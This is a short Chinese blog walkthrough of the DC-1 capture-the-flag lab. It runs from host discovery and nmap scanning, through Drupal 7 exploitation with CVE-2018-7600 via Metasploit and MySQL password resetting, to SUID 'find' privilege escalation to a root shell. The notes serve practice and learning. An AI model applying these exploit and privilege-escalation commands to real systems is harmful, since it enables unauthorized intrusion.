day6 DC-1

ip扫描

Netdisvocer

 

 

 

 

端口扫描

nmap -A

 

 

 

 

80端口 drupal 7 服务

111端口  rpcbind服务

 

入侵靶机

CVE-2018-7600 Drupal核心远程代码执行漏洞

CVE-2018-7602

https://github.com/pimps/CVE-2018-7600

 

 

 

 

反弹shell

 

使用Metasploit进行漏洞查找攻击

Msfconsole启动

 

search drupal

 

Use exploit/unix/webapp/drupal_drupalgeddon2

 

Show options

 

set rhost 192.168.17.137

 

Exploit

Shell

 

 

 

 

https://www.cnblogs.com/sparkdev/p/11605804.html

Pty伪终端

python -c 'import pty;pty.spawn("/bin/bash")'  python -c 执行单行命令/脚本

将简单的Shell转换成为完全交互式的tty

 

 

 

 

 

 

 

 

Mysql -u dbuser -p

 

 

 

 

 

 

 

 

 

 

 

 

利用数据库update语句进行密码重置

php scripts/password-hash.sh password>password.txt

 

 

 

 

 

 

 

 

 

Suid提权

https://blog.csdn.net/qq_36119192/article/details/84872644

 

 

find / -type f -perm -u=s 2>/dev/null

 

 

发现find命令被设置为suid权限位

find / -type f -name getflag -exec "whoami" \;

find / -type f -name getflag -exec "/bin/sh" \;

 

 

 

 

关于flag4

https://www.jianshu.com/p/b659f4619c88

 

posted @ 2020-01-22 23:26  轩x  阅读(227)  评论(0编辑  收藏  举报